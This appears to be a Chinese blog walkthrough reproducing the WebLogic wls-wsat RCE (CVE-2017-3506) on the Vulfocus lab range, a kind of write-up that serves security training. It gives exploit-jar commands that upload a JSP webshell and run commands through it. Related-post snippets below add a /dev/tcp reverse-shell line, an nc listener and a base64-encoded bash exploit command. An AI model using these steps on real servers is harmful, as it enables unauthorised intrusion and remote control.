【Vulfocus】weblogic wls-wsat组件远程命令执行(CVE-2017-3506)漏洞复现

原创 已于 2024-09-26 16:39:02 修改 · 1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全性测试

于 2024-09-26 16:22:40 首次发布

一、漏洞介绍

1.靶场地址:https://vulfocus.cn/

2.名称:weblogic wls-wsat组件远程命令执行(CVE-2017-3506)

3.漏洞描述:Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。

4.漏洞影响:
OracleWebLogic Server10.3.6.0.0
OracleWebLogic Server12.1.3.0.0
OracleWebLogic Server12.2.1.1.0
OracleWebLogic Server12.2.1.2.0

二、复现过程

1.启动靶场,得到IP和端口资产信息
在这里插入图片描述
2.利用工具cve-2017-3506_webshell.jar(在本文顶部获取资源下载),验证漏洞是否存在并利用

java -jar cve-2017-3506_webshell.jar -u http://123.58.224.8:64237

在这里插入图片描述
3.显示漏洞存在,上传木马,payload如下

java -jar cve-2017-3506_webshell.jar -s http://123.58.224.8:64237 /wls-wsat/CoordinatorPortType11 shell1.jsp

在这里插入图片描述
4.成功反弹shell,将http://123.58.224.8:64237/wls-wsat/shell1.jsp?password=secfree&command=whoami复制粘贴到浏览器访问试试
在这里插入图片描述
5.成功执行,根据题目提示flag存在于/tmp中,改成ls /tmp试试,即http://123.58.224.8:64237/wls-wsat/shell1.jsp?password=secfree&command=ls /tmp
在这里插入图片描述
6.得到flag,提交验证,恭喜通过。
在这里插入图片描述

三、修复建议

Oracle官方已经在关键补丁更新中修复了此漏洞,受影响的用户请尽快升级更新进行防护。

Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)
Aquarius_ego的博客
05-16 1920
Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)/spring-core-rce-2022-03-29
weblogic漏洞分析之CVE-2017-10271
洋洋的小黑屋
08-17 1654
weblogic漏洞分析之CVE-2017-10271 一、环境搭建 1)配置docker 这里使用vulhub的环境:CVE-2017-10271 编辑docker-compose.yml文件,加入8453端口 version: '2' services: weblogic: image: vulhub/weblogic:10.3.6.0-2017 ports: - "7001:7001" - "8453:8453" 启动docker docker-compose
Weblogic漏洞CVE-2017-3506
qq_68186313的博客
08-06 433
Veblogic的WLS Security组件对外提供了webserver服务,其中使用了XMLDecoder:来解析用户输入的XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执行。1、验证是否存在wls-wsat组件。4、使用哥斯拉连接回显的地址。2、使用漏洞利用工具检测。
WebLogic漏洞复现(附带修复方法)_weblogic漏洞修复
最新发布
Python84310366的博客
06-13 1148
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
weblogic wls-wsat组件远程命令执行CVE-2017-3506
Cherish what you have!
11-22 414
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。
【精选】WebLogic-CVE-2017-3506
人若无名,便可专心练剑
12-06 978
记得要在WebLogic-XMLDecoder.jar文件中的目录下进行执行,要不然会报错。用123替换下burp里面的内容,然后进行测试下。先进行检测下漏洞是否存在。
Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271
qq_42430287的博客
12-22 1468
2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。在 Red Ha
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: ...
weblogic CVE-2017-10271漏洞复现
qq_68581192的博客
05-24 1989
名称:weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)原理:WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者可以构造XML语句,上传一句话木马,getshell。
vulfocus[weblogic反序列化]
qq_44122254的博客
02-18 3860
名称: vulfocus/weblogic-cve_2017_10271:latest 描述: Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
Web Weblogic wls9-async反序列化远程代码执行漏洞(CVE-2019-2725)
weixin_38477805的博客
05-13 2266
Web Weblogic wls9-async反序列化远程代码执行漏洞(CVE-2019-2725) 1.漏洞说明 1.1 描述:部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命...
webLogic反序列化漏洞CVE-2017-3506
2401_82451607的博客
09-22 664
webLogic反序列化漏洞CVE-2017-3506
CVE-2017-3506 Weblogic 远程代码执行
weixin_53639243的博客
01-29 626
CVE-2017-3506 Weblogic 远程代码执行
vulfocus靶场jenkins代码执行漏洞cve-1027-1000353
没有故事
04-23 483
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,上一步生成的base64编码}|{base64,-d}|{bash,-i}"python3 exploit.py http://受害者IP:端口 jenkins_poc.ser。bash -i >& /dev/tcp/监听机的IP/端口 0>&1。攻击机监听: nc -lvp 4444。GitCode - 开发者的代码家园。
vulfocus复现:Spring Framework 远程命令执行漏洞
woai_zhongguo的博客
07-18 1520
vulfocus复现:Spring Framework 远程命令执行漏洞
Weblogic-wls-wsat-unserialize_CVE-2017-10271
来日可期的博客
12-09 1283
简介:RMI通信时会将数据进行序列化后进行传输,同样的接收数据后反序列化进行接收,正常RMI通信使用的是JRMP协议,而在Weblogic的RMI通信中使用的是T3协议。T3协议是Weblogic独有的一个协议,相比于JRMP协议多了如下的一些特性。主要包含请求包头和请求主体这两部分内容,总共分为七个部分,第一部分是协议头,也就是请求包头,后面2-7都是请求主体。然后发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误)修改数据包,进行URL编码,然后进行发送。
(2022年12月最新)最详细vulfocus靶场 Log4j2远程命令执行漏洞复现
qq1140037586的博客
12-15 1308
1、向目标发送指定payload,目标对payload进行解析执行,然后会通过ldap链接远程服务,当ldap服务收到请求之后,将请求进行重定向到恶意 java class的地址。 2、目标服务器收到重定向请求之后,下载恶意class并执行其中的代码,从而执行系统命令。
weblogic 禁止 /_async/*,/wls-wsat/*路径的 URL 访问
04-01
另外需要注意的是,由于存在 CVE-2017-3506 这样的已知漏洞影响到了 Oracle WebLogic Server 版本 12.2.1.2.0 ,因此除了简单的 URL 屏蔽外还建议及时更新补丁程序或者应用其他防护措施比如 WAF(Web Application ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

JavaLord123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值